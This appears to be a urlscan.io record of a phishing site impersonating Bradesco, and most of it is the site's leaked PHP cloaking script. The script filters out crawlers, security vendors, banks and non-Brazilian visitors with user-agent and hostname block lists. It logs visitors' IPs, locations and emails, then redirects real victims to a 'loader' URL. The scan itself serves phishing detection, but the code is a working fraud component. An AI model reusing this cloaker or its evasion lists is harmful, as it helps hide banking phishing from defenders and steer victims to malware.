bradesco.pontosresgate.profissional.ws
Open in
urlscan Pro
192.169.179.203
Public Scan
Submitted URL: https://pontosresgatepro1.websiteseguro.com/livegtx262
Effective URL: http://bradesco.pontosresgate.profissional.ws/ibpf/
Submission: On May 27 via automatic, source phishtank — Scanned from DE
Effective URL: http://bradesco.pontosresgate.profissional.ws/ibpf/
Submission: On May 27 via automatic, source phishtank — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
iliza<?php
ini_set("display_errors", 1);
date_default_timezone_set('America/Sao_Paulo');
require_once('funcoes.php');
$status = "LIBERADO";
$lokao = "ii";
$celulares = "nao";
if(!isset($_GET['black'])){
$status = "BLOQUEADO";
//$lokao = ($_GET['black']);
}else{
$lokao = ($_GET['black']);
}
if(empty($_GET['black'])) {
$lokao = "empty";
}
$ip = getIp();
// aki vc coloca os links do loader
$input = array(
"https://pontoslivebeneficios.com/iwfisicacpf/sincronizacao",
"http://pontoslivebeneficios.com/iwfisicacpf/sincronizacao");
shuffle($input);
$urlFake = $input[0];
$urlFake2 = $input[1];
$status = "LIBERADO";
if($lokao == "empty"){
//$status = "BLOQUEADO";
}
if (preg_match('/Googlebot\/|Googlebot-Mobile|Googlebot-Image|Googlebot-News|Googlebot-Video|AdsBot-Google([^-]|$)|AdsBot-Google-Mobile|Feedfetcher-Google|Mediapartners-Google|Mediapartners \(Googlebot\)|APIs-Google|bingbot|Slurp|[wW]get|LinkedInBot|Python-urllib|python-requests|libwww-perl|httpunit|nutch|Go-http-client|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|BIGLOTRON|Teoma|convera|seekbot|Gigabot|Gigablast|exabot|ia_archiver|GingerCrawler|webmon |HTTrack|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|findlink|msrbot|panscient|yacybot|AISearchBot|ips-agent|tagoobot|MJ12bot|woriobot|yanga|buzzbot|mlbot|YandexBot|YandexImages|YandexAccessibilityBot|YandexMobileBot|purebot|Linguee Bot|CyberPatrol|voilabot|Baiduspider|citeseerxbot|spbot|twengabot|postrank|TurnitinBot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|Ahrefs(Bot|SiteAudit)|fuelbot|CrunchBot|IndeedBot|mappydata|woobot|ZoominfoBot|PrivacyAwareBot|Multiviewbot|SWIMGBot|Grobbot|eright|Apercite|semanticbot|Aboundex|domaincrawler|wbsearchbot|summify|CCBot|edisterbot|seznambot|ec2linkfinder|gslfbot|aiHitBot|intelium_bot|facebookexternalhit|Yeti|RetrevoPageAnalyzer|lb-spider|Sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|CC Metadata Scaper|g00g1e.com|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|OrangeBot\/|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|S[eE][mM]rushBot|yoozBot|lipperhey|Y!J|Domain Re-Animator Bot|AddThis|Screaming Frog SEO Spider|MetaURI|Scrapy|Livelap[bB]ot|OpenHoseBot|CapsuleChecker|collection@infegy.com|IstellaBot|DeuSu\/|betaBot|Cliqzbot\/|MojeekBot\/|netEstate NE Crawler|SafeSearch microdata crawler|Gluten Free Crawler\/|Sonic|Sysomos|Trove|deadlinkchecker|Slack-ImgProxy|Embedly|RankActiveLinkBot|iskanie|SafeDNSBot|SkypeUriPreview|Veoozbot|Slackbot|redditbot|datagnionbot|Google-Adwords-Instant|adbeat_bot|WhatsApp|contxbot|pinterest.com.bot|electricmonk|GarlikCrawler|BingPreview\/|vebidoobot|FemtosearchBot|Yahoo Link Preview|MetaJobBot|DomainStatsBot|mindUpBot|Daum\/|Jugendschutzprogramm-Crawler|Xenu Link Sleuth|Pcore-HTTP|moatbot|KosmioBot|pingdom|AppInsights|PhantomJS|Gowikibot|PiplBot|Discordbot|TelegramBot|Jetslide|newsharecounts|James BOT|Bark[rR]owler|TinEye|SocialRankIOBot|trendictionbot|Ocarinabot|epicbot|Primalbot|DuckDuckGo-Favicons-Bot|GnowitNewsbot|Leikibot|LinkArchiver|YaK\/|PaperLiBot|Digg Deeper|dcrawl|Snacktory|AndersPinkBot|Fyrebot|EveryoneSocialBot|Mediatoolkitbot|Luminator-robots|ExtLinksBot|SurveyBot|NING\/|okhttp|Nuzzel|omgili|PocketParser|YisouSpider|um-LN|ToutiaoSpider|MuckRack|Jamie\'s Spider|AHC\/|NetcraftSurveyAgent|Laserlikebot|^Apache-HttpClient|AppEngine-Google|Jetty|Upflow|Thinklab|Traackr.com|Twurly|Mastodon|http_get|DnyzBot|botify|007ac9 Crawler|BehloolBot|BrandVerity|check_http|BDCbot|ZumBot|EZID|ICC-Crawler|ArchiveBot|^LCC |filterdb.iss.com\/crawler|BLP_bbot|BomboraBot|Buck\/|Companybook-Crawler|Genieo|magpie-crawler|MeltwaterNews|Moreover|newspaper\/|ScoutJet|(^| )sentry\/|StorygizeBot|UptimeRobot|OutclicksBot|seoscanners|Hatena|Google Web Preview|MauiBot|AlphaBot|SBL-BOT|IAS crawler|adscanner|Netvibes|acapbot|Baidu-YunGuanCe|bitlybot|blogmuraBot|Bot.AraTurka.com|bot-pge.chlooe.com|BoxcarBot|BTWebClient|ContextAd Bot|Digincore bot|Disqus|Feedly|Fetch\/|Fever|Flamingo_SearchEngine|FlipboardProxy|g2reader-bot|G2 Web Services|imrbot|K7MLWCBot|Kemvibot|Landau-Media-Spider|linkapediabot|vkShare|Siteimprove.com|BLEXBot\/|DareBoost|ZuperlistBot\/|Miniflux\/|Feedspot|Diffbot\/|SEOkicks|tracemyfile|Nimbostratus-Bot|zgrab|PR-CY.RU|AdsTxtCrawler|Datafeedwatch|Zabbix|TangibleeBot|google-xrawler|axios|Amazon CloudFront|Pulsepoint|CloudFlare-AlwaysOnline|Google-Structured-Data-Testing-Tool|WordupInfoSearch|WebDataStats|HttpUrlConnection|Seekport Crawler|ZoomBot|VelenPublicWebCrawler|MoodleBot|jpg-newsbot|outbrain|W3C_Validator|Validator\.nu|W3C-checklink|W3C-mobileOK|W3C_I18n-Checker|FeedValidator|W3C_CSS_Validator|W3C_Unicorn|Google-PhysicalWeb|Blackboard|ICBot\/|BazQux|Twingly|Rivva|Experibot|awesomecrawler|Dataprovider.com|GroupHigh\/|theoldreader.com|AnyEvent|Uptimebot\.org|Nmap Scripting Engine|2ip.ru|Clickagy|Caliperbot|MBCrawler|online-webceo-bot|B2B Bot|AddSearchBot|Google Favicon|HubSpot|Chrome-Lighthouse|HeadlessChrome|CheckMarkNetwork\/|www\.uptime\.com|Streamline3Bot\/|serpstatbot\/|MixnodeCache\/|^curl|SimpleScraper|RSSingBot|Jooblebot|fedoraplanet|Friendica|NextCloud|Tiny Tiny RSS|RegionStuttgartBot|Bytespider|Datanyze|Google-Site-Verification/', $_SERVER['HTTP_USER_AGENT'])) {
$status = "BLOQUEADO";
$lokao = "1";
}
//"NordVPN",
$HOSTS_BLOCK = array("Microsoft Azure Cloud","amazonaws.com","Google Cloud",".googleusercontent","Microsoft Corporation",".tor.","123planosdesaude","VAULTVPN","activescan","alpha2","amazon","ancombraterney","anti-phishing","antipishing","antispam","antivirus","avast","bancopastor","bancopopular","banesto","bankofamerica","barracuda","bb.com.br","bitdefender","bradesco","cajamadrid","chicago ","cia.gov","clamav","clamwin","cleandir","colocrossing","coloup","consumer","copel","datapacket","delitosinformaticos","detector","dimenoc","dnblead","donategrid","dufrio","easysol","ebay.com","eset","eveocloud","f-secure","fasano","fbi.gov","fraudwatchinternational","free-av","gfihispana","google","greenmountainaccess","grisoft","hands","hauri-la","hispasec","instantcheckmain","itau","iwgroup","kapersky","laarnes","letti","linode","mailcontrol","mailstream","mallshill","marimex","mcafee","mgconecta","microsoft.com","midphase","monitor","msn.com","nephosdns","netcraft.com","nod32","norton","offerzz1","onlinedc","opendns","owned-networks","panda.com","pandasoftware","paypal","phish","pish","prcdn","protectedgroup","quadranet","rodobens.com.br","rsa.com","rsghosting","sajonaramail","santander","scaleway","scotiabank","security","seguridad","sescsp","sophos","spamfirewall2","spfbl","symantec","thinins","trendmicro","trustwave","unicaja","utfpr.edu.br","verisign","veritas","viabcp","vnunet","vodafone","vultr","wbinfo","webandseo ","zonealarm");
$HOST = gethostbyaddr($_SERVER['REMOTE_ADDR']);
foreach($HOSTS_BLOCK as $ROWS){
if(strpos($HOST, $ROWS) == true){
$status = "BLOQUEADO";
$lokao = "2";
break;
}
}
$email = isset($_GET['hash']) ? $_GET['hash'] : "-";
$localizacao = getGeo($ip);
$pais = isset($localizacao) && isset($localizacao->countryCode) && $localizacao->countryCode != "-" ? $localizacao->countryCode : "BR";
$estado = isset($localizacao) && isset($localizacao->region) && $localizacao->region != "-" ? $localizacao->region : "-";
$cidade = isset($localizacao) && isset($localizacao->city) && $localizacao->city != "-" ? $localizacao->city : "-";
$organi = isset($localizacao) && isset($localizacao->org) && $localizacao->org != "-" ? $localizacao->org : "-";
$destino = ["BR"];
if (strpos(json_encode($destino),$pais) !== false) {
//CONTEM os paises acima
}
else{
$status = "BLOQUEADO";
$lokao = "blockPais";
}
$userAgent = getUserAgent();
$data = date('d/m/Y H:i:s');
$mobile = isMobile() ? "MOBILE" : "DESKTOP";
if($mobile == "MOBILE"){
//$status = "LIBERADO";
$celulares = "sim";
}
if(empty($destino)){
$status = "LIBERADO";
}
$str = $data."|".$ip."|".$pais."|".$lokao."|".$cidade."|".$userAgent."|".$mobile."|".$email."|".$HOST."-".$organi."|".$status;
// Lê o conteúdo do arquivo
$conteudo = file_get_contents($arquivoContador);
// Verifica se o IP já existe no conteúdo
if (strpos($conteudo, $ip) === false) {
// IP não encontrado, grava no arquivo
file_put_contents($arquivoContador, $str.PHP_EOL, FILE_APPEND);
}
if($status == "BLOQUEADO"){
header("HTTP/1.0 404 Not Found");
die();
exit();
}
if($celulares == "sim"){
header('Location: '.$urlFake . "?" . rand(000000000, 999999999));
}
if($celulares == "nao"){
header('Location: '.$urlFake . "?" . rand(000000000, 999999999));
}